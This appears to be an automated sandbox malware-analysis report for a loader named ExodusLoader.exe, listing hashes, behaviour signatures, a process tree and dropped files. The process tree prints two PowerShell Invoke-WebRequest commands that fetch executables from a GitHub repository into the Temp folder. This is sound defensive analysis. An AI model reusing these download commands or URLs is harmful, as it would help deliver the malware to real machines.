Overview

overview

10

Static

static

3

ExodusLoader.exe

windows7-x64

8

ExodusLoader.exe

windows10-2004-x64

Analysis

  • max time kernel
    2s
  • max time network
    1s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04/03/2025, 22:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ExodusLoader.exe

  • Size

    89KB

  • MD5

    2f3405fa61bec944ed9d869adb6a37e3

  • SHA1

    4a3c839b899809ba89a99eaadecf4da6d71e8256

  • SHA256

    ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234

  • SHA512

    72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0

  • SSDEEP

    1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2936
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BFF5.tmp\BFF6.tmp\BFF7.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1832
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2788

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\BFF5.tmp\BFF6.tmp\BFF7.bat
    Filesize

    491B

    MD5

    54436d8e8995d677f8732385734718bc

    SHA1

    246137700bee34238352177b56fa1c0f674a6d0b

    SHA256

    20c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3

    SHA512

    57ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    81ea566daa7723a7af9e89253e227251

    SHA1

    7b93b7cfe61a4d249461046063954f6f1861742c

    SHA256

    42ce36c6a5f40c4eb2bbb5d5b88057c84b675ec56d165b81ed22fbd0ef6d7d9f

    SHA512

    73ecfaaa636153ffee56727faa6e1f9c94a4d4af078c94ac38d7f6038914f16cccb4e660a2585d11c2e8e11a8b132f515d4c5c1d547380d8cfd7e9b196dca4d2

    Download Submit

  • memory/2052-6-0x000007FEF65EE000-0x000007FEF65EF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2052-7-0x000000001B770000-0x000000001BA52000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2052-8-0x0000000001E20000-0x0000000001E28000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2052-9-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-10-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-11-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-12-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2052-13-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2788-20-0x0000000001E50000-0x0000000001E58000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2788-19-0x000000001B770000-0x000000001BA52000-memory.dmp

    Filesize

    2.9MB

    Download